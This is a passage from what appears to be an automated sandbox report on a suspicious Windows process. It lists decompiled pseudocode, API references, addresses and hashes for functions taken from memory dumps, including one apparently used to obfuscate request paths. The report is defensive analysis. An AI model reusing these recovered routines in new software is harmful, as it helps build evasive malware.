						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L04777F56();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L04777F50();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E04775381(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E047745B4(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04775936(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E0477A188) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x04771e94
0x04771ea0
0x04771ea6
0x04771eab
0x04771eaf
0x04772021
0x04772025
0x04772025
0x04771eb5
0x04771eb9
0x04771ebf
0x04771ec0
0x04771ecb
0x04771ed1
0x04771ed6
0x04771ed9
0x04771ef3
0x04771f02
0x04771f0e
0x04771f18
0x04771f1d
0x04771f1f
0x04771f22
0x04771fd9
0x04771fdf
0x04771ff0
0x04772003
0x04772019
0x00000000
0x0477201e
0x04771f2b
0x04771f32
0x04771f36
0x04771f3c
0x04771f3e
0x04771f40
0x04771f42
0x04771f44
0x04771f4e
0x04771f53
0x04771f55
0x04771f57
0x04771f58
0x04771f59
0x04771f5a
0x04771f61
0x04771f68
0x04771f6b
0x04771f6b
0x04771f38
0x04771f38
0x04771f38
0x04771f73
0x04771f7b
0x04771f87
0x04771f8c
0x04771f8c
0x04771f91
0x00000000
0x00000000
0x04771f93
0x04771f96
0x04771fa3
0x00000000
0x00000000
0x04771fa5
0x04771fa5
0x04771fb2
0x04771f8c
0x04771f91
0x00000000
0x00000000
0x00000000
0x04771f91
0x04771fbc
0x04771fbf
0x04771fc2
0x04771fc9
0x04771fc9
0x04771fd6
0x00000000
0x04771fd6
0x04771ec2
0x04771ec6
0x04771ec7
0x04771ec9
0x00000000
0x00000000
0x00000000
0x04771ec9
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 04771F44
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04771F5A
memset.NTDLL ref: 04772003
memset.NTDLL ref: 04772019

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 1c7eb5832ec9ccc2eca699de81a1faf41c63c2b4cd12bfc5a19d1c0e8daf3b43
Instruction ID: 15e4eb657a9cbf408b0b01540e39096528e433cfd6531689cbf9a76dee6700dc
Opcode Fuzzy Hash: 1c7eb5832ec9ccc2eca699de81a1faf41c63c2b4cd12bfc5a19d1c0e8daf3b43
Instruction Fuzzy Hash: 0B41AD31A01219AFEF109F68CC44BEE77B9EF46314F804569F859A7381EB70BA55CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0477467C, Relevance: 6.1, APIs: 4, Instructions: 108
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E0477467C(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				char* _t40;
				long _t41;
				intOrPtr _t45;
				intOrPtr* _t46;
				char _t48;
				char* _t53;
				long _t54;
				intOrPtr* _t55;
				void* _t64;

				_t64 = __eax;
				_t40 =  &_v12;
				_v8 = 0;
				_v16 = 0;
				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40);
				if(_t40 == 0) {
					_t41 = GetLastError();
					_v8 = _t41;
					if(_t41 != 0x2efe) {
						L26:
						return _v8;
					}
					_v8 = 0;
					L25:
					 *((intOrPtr*)(_t64 + 0x30)) = 0;
					goto L26;
				}
				if(_v12 == 0) {
					goto L25;
				}
				_push( &_v24);
				_push(1);
				_push(0);
				if( *0x477a148() != 0) {
					_v8 = 8;
					goto L26;
				}
				_t45 = E04775C4E(0x1000);
				_v20 = _t45;
				if(_t45 == 0) {
					_v8 = 8;
					L21:
					_t46 = _v24;
					 *((intOrPtr*)( *_t46 + 8))(_t46);
					goto L26;
				} else {
					goto L4;
				}
				do {
					while(1) {
						L4:
						_t48 = _v12;
						if(_t48 >= 0x1000) {
							_t48 = 0x1000;
						}
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
						if(_t48 == 0) {
							break;
						}
						_t55 = _v24;
						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
						_t17 =  &_v12;
						 *_t17 = _v12 - _v16;
						if( *_t17 != 0) {
							continue;
						}
						L10:
						if(WaitForSingleObject( *0x477a2c4, 0) != 0x102) {
							_v8 = 0x102;
							L18:
							E04772A03(_v20);
							if(_v8 == 0) {
								_v8 = E04776589(_v24, _t64);
							}
							goto L21;
						}
						_t53 =  &_v12;
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53);
						if(_t53 != 0) {
							goto L15;
						}
						_t54 = GetLastError();
						_v8 = _t54;
						if(_t54 != 0x2f78 || _v12 != 0) {
							goto L18;
						} else {
							_v8 = 0;
							goto L15;
						}
					}
					_v8 = GetLastError();
					goto L10;
					L15:
				} while (_v12 != 0);
				goto L18;
			}

0x04774684
0x04774687
0x04774690
0x04774693
0x04774696
0x0477469e
0x0477479c
0x047747a7
0x047747aa
0x047747b2
0x047747b9
0x047747b9
0x047747ac
0x047747af
0x047747af
0x00000000
0x047747af
0x047746a7
0x00000000
0x00000000
0x047746b0
0x047746b1
0x047746b3
0x047746bc
0x04774793
0x00000000
0x04774793
0x047746c8
0x047746cf
0x047746d2
0x04774781
0x04774788
0x04774788
0x0477478e
0x00000000
0x00000000
0x00000000
0x00000000
0x047746d8
0x047746d8
0x047746d8
0x047746d8
0x047746dd
0x047746df
0x047746df
0x047746ec
0x047746f4
0x00000000
0x00000000
0x047746f6
0x04774703
0x04774709
0x04774709
0x0477470c
0x00000000
0x00000000
0x04774719
0x0477472d
0x04774763
0x04774766
0x04774769
0x04774771
0x0477477c
0x0477477c
0x00000000
0x04774771
0x0477472f
0x04774736
0x0477473e
0x00000000
0x00000000
0x04774740
0x0477474b
0x0477474e
0x00000000
0x04774755
0x04774755
0x00000000
0x04774755
0x0477474e
0x04774716
0x00000000
0x04774758
0x04774758
0x00000000

APIs

GetLastError.KERNEL32 ref: 0477479C

Part of subcall function 04775C4E: RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A

GetLastError.KERNEL32 ref: 04774710
WaitForSingleObject.KERNEL32(00000000), ref: 04774720
GetLastError.KERNEL32 ref: 04774740

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorLast$AllocateHeapObjectSingleWait
String ID:
API String ID: 35602742-0
Opcode ID: b52ddd7d638e862d28d36be4d3022f3c2ad0e4abe63fafa13e34db273ca58ec2
Instruction ID: e46259c3189bd6ab5ce2c56af65bbf987fe7ccb2417233297e373193d379bc86
Opcode Fuzzy Hash: b52ddd7d638e862d28d36be4d3022f3c2ad0e4abe63fafa13e34db273ca58ec2
Instruction Fuzzy Hash: C1410AB4A01209EFDF10DFA5C9889AEBBBDFF45345FA08469E501E6250E734AE40DB51

Uniqueness

Uniqueness Score: -1.00%

Function 6C552328, Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6C55235E
__isleadbyte_l.LIBCMT ref: 6C55238C
MultiByteToWideChar.KERNEL32(00000000,00000009,00000040,00000001,?,00000000), ref: 6C5523BA
MultiByteToWideChar.KERNEL32(00000000,00000009,00000040,00000001,?,00000000), ref: 6C5523F0

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 7a72e7cddda788c7839d0ef1ed5832f63bab5cfdf505fbcfafb96bba24e32371
Instruction ID: 5a80abe2180239740689a8a7b1b4d1af9a2c6f97a7984e8a00b659925f0fcf83
Opcode Fuzzy Hash: 7a72e7cddda788c7839d0ef1ed5832f63bab5cfdf505fbcfafb96bba24e32371
Instruction Fuzzy Hash: 7731F230601246EFDB15CF25CC48BAE7BB5FF41314F56452AE8249B9A0E730D8A1DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04774CD5, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E04774CD5(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x477a2c8; // 0xbd092303
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0x477a2d0; // 0x96d5a8
				_t3 = _t8 + 0x477b84d; // 0x61636f4c
				_t25 = 0;
				_t30 = E04771970(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x477a2d4, 1, 0, _t30);
					E04772A03(_t30);
				}
				_t12 =  *0x477a2b4; // 0x4000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 != 0 && E047719E7() == 0) {
						_t28 =  *0x477a124( *_t32, 0x20);
						if(_t28 != 0) {
							 *_t28 =  *_t28 & 0x00000000;
							_t28 =  &(_t28[1]);
						}
						_t31 = E047763CD(0, _t28,  *_t32, 0);
						if(_t31 == 0) {
							if(_t25 == 0) {
								goto L21;
							}
							_t31 = WaitForSingleObject(_t25, 0x4e20);
							if(_t31 == 0) {
								goto L19;
							}
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E04777836(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}

0x04774cd6
0x04774cdd
0x04774ce7
0x04774ceb
0x04774cf1
0x04774cfe
0x04774d05
0x04774d09
0x04774d1b
0x04774d1d
0x04774d1d
0x04774d22
0x04774d29
0x04774d34
0x04774d4a
0x04774d4e
0x04774d50
0x04774d55
0x04774d55
0x04774d62
0x04774d66
0x04774d6a
0x00000000
0x00000000
0x04774d78
0x04774d7c
0x00000000
0x00000000
0x04774d7c
0x04774d66
0x00000000
0x04774d7e
0x04774d7e
0x04774d7e
0x04774d84
0x04774d86
0x04774d86
0x04774d90
0x04774d94
0x04774da6
0x04774da6
0x04774daa
0x04774db0
0x04774db0
0x04774db3
0x04774db5
0x04774db8
0x04774db8
0x04774dbf
0x04774dc5
0x04774dc5

APIs

Part of subcall function 04771970: lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,04773EC5,74666F53,00000000,?,00000000,?,?,04772F4F), ref: 047719A6
Part of subcall function 04771970: lstrcpy.KERNEL32(00000000,00000000), ref: 047719CA
Part of subcall function 04771970: lstrcat.KERNEL32(00000000,00000000), ref: 047719D2

CreateEventA.KERNEL32(0477A2D4,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,04777338,?,?,?), ref: 04774D14

Part of subcall function 04772A03: RtlFreeHeap.NTDLL(00000000,00000000,04774072,00000000,?,?,00000000,?,?,?,?,?,?,047744AE,00000000), ref: 04772A0F

WaitForSingleObject.KERNEL32(00000000,00004E20,04777338,00000000,?,00000000,?,04777338,?,?,?,?,?,?,?,04771C40), ref: 04774D72
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,04777338,?,?,?), ref: 04774DA0
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,04777338,?,?,?), ref: 04774DB8

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: c132c1d6ce0c6921aa6b36cca048d861b694ec33a53a57b79647b31f3394cf45
Instruction ID: 88d90c648bb266bc44181ecc05802930d8f5a8e5cad86b9ecfbcb57d1141ad4d
Opcode Fuzzy Hash: c132c1d6ce0c6921aa6b36cca048d861b694ec33a53a57b79647b31f3394cf45
Instruction Fuzzy Hash: C221B172601722BBEF214EA89948B9A73E9FF49715FC58624FF8197340EB74EC00C680

Uniqueness

Uniqueness Score: -1.00%

Function 04777289, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E04777289(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E04772616(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E047728B8(_t23);
						}
					}
					return _t38;
				}
				if(E04774380(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x477a2d4, 1, 0,  *0x477a394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E04777360(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E0477202E(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04773EFA(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E04774CD5( &_v32, _t39);
					goto L13;
				}
			}

0x04777289
0x04777296
0x0477729c
0x0477729d
0x0477729e
0x0477729f
0x047772a0
0x047772a4
0x047772b0
0x047772b4
0x0477733c
0x0477733c
0x0477733f
0x04777341
0x04777349
0x0477734f
0x04777352
0x04777352
0x0477734f
0x0477735d
0x0477735d
0x047772c7
0x047772c9
0x047772c9
0x047772e0
0x047772e4
0x047772e7
0x047772f2
0x047772f9
0x047772f9
0x04777305
0x04777306
0x04777314
0x04777308
0x04777308
0x04777309
0x0477730a
0x0477730b
0x0477730c
0x0477730d
0x0477730d
0x04777319
0x0477731e
0x04777320
0x04777322
0x04777322
0x04777329
0x00000000
0x0477732b
0x0477732b
0x04777338
0x00000000
0x04777338

APIs

CreateEventA.KERNEL32(0477A2D4,00000001,00000000,00000040,?,?,73BCF710,00000000,73BCF730,?,?,?,?,04771C40,?,00000001), ref: 047772DA
SetEvent.KERNEL32(00000000,?,?,?,?,04771C40,?,00000001,04772F7D,00000002,?,?,04772F7D), ref: 047772E7
Sleep.KERNEL32(00000BB8,?,?,?,?,04771C40,?,00000001,04772F7D,00000002,?,?,04772F7D), ref: 047772F2
CloseHandle.KERNEL32(00000000,?,?,?,?,04771C40,?,00000001,04772F7D,00000002,?,?,04772F7D), ref: 047772F9

Part of subcall function 04777360: WaitForSingleObject.KERNEL32(00000000,?,?,?,04777319,?,04777319,?,?,?,?,?,04777319,?), ref: 0477743A
Part of subcall function 04777360: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,04777319,?,?,?,?,?,04771C40,?), ref: 04777462

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseEvent$CreateHandleObjectSingleSleepWait
String ID:
API String ID: 467273019-0
Opcode ID: 7f869f5695feb8844f7293c183bcc5e011643246f650612f45bd544780836779
Instruction ID: 13762c10bcc015006e43872ca55083401b22b8f03277bea6a1135b6e7aa1e9d0
Opcode Fuzzy Hash: 7f869f5695feb8844f7293c183bcc5e011643246f650612f45bd544780836779
Instruction Fuzzy Hash: 35216573A0025AABEF10AFE588848EE77B9EB44254BC54875EA15E7340E774F941CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04774138, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E04774138(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x477a290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x477a2a8; // 0xb29674c9
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x477a2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x04774140
0x04774143
0x04774149
0x04774161
0x04774165
0x04774168
0x0477416a
0x0477416d
0x0477416f
0x04774172
0x04774174
0x04774174
0x04774176
0x04774181
0x04774186
0x04774197
0x0477419f
0x047741a4
0x047741a7
0x047741aa
0x047741ac
0x047741b2
0x047741b5
0x047741b5
0x047741b5
0x047741c0
0x047741c5
0x047741cf

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04775B76,00000000,?,00000000,04776301,00000000,050E9630), ref: 04774143
RtlAllocateHeap.NTDLL(00000000,?), ref: 0477415B
memcpy.NTDLL(00000000,050E9630,-00000008,?,?,?,04775B76,00000000,?,00000000,04776301,00000000,050E9630), ref: 0477419F
memcpy.NTDLL(00000001,050E9630,00000001,04776301,00000000,050E9630), ref: 047741C0

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 27725a865a0d0a6f4da5e98d62d1adfae43eb6daaf30537d77890fec7be836f6
Instruction ID: db9b9202e47f1d7e30e5a4500428439515b1dc308eb2b3e831a9980e8bbbd410
Opcode Fuzzy Hash: 27725a865a0d0a6f4da5e98d62d1adfae43eb6daaf30537d77890fec7be836f6
Instruction Fuzzy Hash: 351129B2A00215BFD710CF69DC88DDEBBAEEBD52A0B954176F904D7250EB74AE04C760

Uniqueness

Uniqueness Score: -1.00%

Function 047749BA, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E047749BA(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E04775C4E(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x47792c4);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x47792c4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x047749c5
0x047749c9
0x047749cb
0x047749cc
0x047749d4
0x047749d4
0x047749d8
0x00000000
0x00000000
0x047749cf
0x047749d0
0x047749d3
0x047749d3
0x047749e0
0x047749e7
0x047749eb
0x047749f3
0x047749f9
0x047749fb
0x04774a00
0x04774a04
0x04774a06
0x04774a09
0x04774a10
0x04774a10
0x04774a1a
0x04774a1d
0x04774a20
0x04774a20
0x04774a2c
0x04774a2c
0x04774a39

APIs

StrChrA.SHLWAPI(?,00000020,00000000,050E962C,?,?,?,04776072,050E962C,?,?,04772F44), ref: 047749D4
StrTrimA.SHLWAPI(?,047792C4,00000002,?,?,?,04776072,050E962C,?,?,04772F44), ref: 047749F3
StrChrA.SHLWAPI(?,00000020,?,?,?,04776072,050E962C,?,?,04772F44,?,?,?,?,?,047744F9), ref: 047749FE
StrTrimA.SHLWAPI(00000001,047792C4,?,?,?,04776072,050E962C,?,?,04772F44,?,?,?,?,?,047744F9), ref: 04774A10

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 41ab4576b7ee6dd26b992c8f0df561813fc8bf0343d5c1c08db360e3ca81b4f3
Instruction ID: 67cb4bbcdba4bfa26bfaa5f775664649d27792193714e60e709a3ee6760609a4
Opcode Fuzzy Hash: 41ab4576b7ee6dd26b992c8f0df561813fc8bf0343d5c1c08db360e3ca81b4f3
Instruction Fuzzy Hash: 7901DDB16053116FE731DE55DC49F2B7FE8EB46AA0F520919F581C7340EB64DC018AA4

Uniqueness

Uniqueness Score: -1.00%

Function 6C53E2D0, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6C53E2FC

Part of subcall function 6C542000: __lock.LIBCMT ref: 6C542011

std::exception::exception.LIBCMT ref: 6C53E35D

Part of subcall function 6C544920: std::exception::_Copy_str.LIBCMT ref: 6C544939

__CxxThrowException@8.LIBCMT ref: 6C53E374

Part of subcall function 6C544A87: RaiseException.KERNEL32(?,00000000,?,?,00000000), ref: 6C544ADC

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6C53E37B

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrow__lockstd::exception::_std::exception::exception
String ID:
API String ID: 271752322-0
Opcode ID: 2b3b6e6723eb042a15c1c769ed2a318c639cbbde6adf2725a4a49a7e420fb218
Instruction ID: 75e84e18f0d0d47583a09adfd5bcab01d07b0f87cfba9ac1ed6c61a328e24978
Opcode Fuzzy Hash: 2b3b6e6723eb042a15c1c769ed2a318c639cbbde6adf2725a4a49a7e420fb218
Instruction Fuzzy Hash: 3F2117B1408B809FD320CF29CC45B47BBE4BB59318F048E1EE489D7B51E775A508CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 6C545D49, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 6C545D60

Part of subcall function 6C546388: ___BuildCatchObjectHelper.LIBCMT ref: 6C5463BA
Part of subcall function 6C546388: ___AdjustPointer.LIBCMT ref: 6C5463D1

_UnwindNestedFrames.LIBCMT ref: 6C545D77
___FrameUnwindToState.LIBCMT ref: 6C545D89
CallCatchBlock.LIBCMT ref: 6C545DAD

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: c8c05acd160c18110a825d926067d22bf0635e9fd943c4b85a96cd4fad5b6d9c
Instruction ID: 06ef5a2d8d22aa8a92496df2168eaa61385d82b55d0d916cf3263432c2d04bcf
Opcode Fuzzy Hash: c8c05acd160c18110a825d926067d22bf0635e9fd943c4b85a96cd4fad5b6d9c
Instruction Fuzzy Hash: F501E932000609FBCF129F65CC04EDA7BBAEF89758F558115F91866620D732E965DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C54E11F, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6C54E143

Part of subcall function 6C54E82A: __fltout2.LIBCMT ref: 6C54E853

__cftog_l.LIBCMT ref: 6C54E169
__cftoe_l.LIBCMT ref: 6C54E19B

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: aeb5e0d8d14cba1a8152e2aa050c80c04b4ab79af9873b8d7e3320efd685411a
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: C9014C3208024AFBCF029E84DC01DEE7F22BF59358F549915FE2898530D376D9B1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 04771970, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E04771970(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E0477354E(_t8, _t1);
				_t16 = E04775C4E(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E0477756E(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E04775C4E(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E04772A03(_t16);
				}
				return _t18;
			}

0x0477197b
0x0477197c
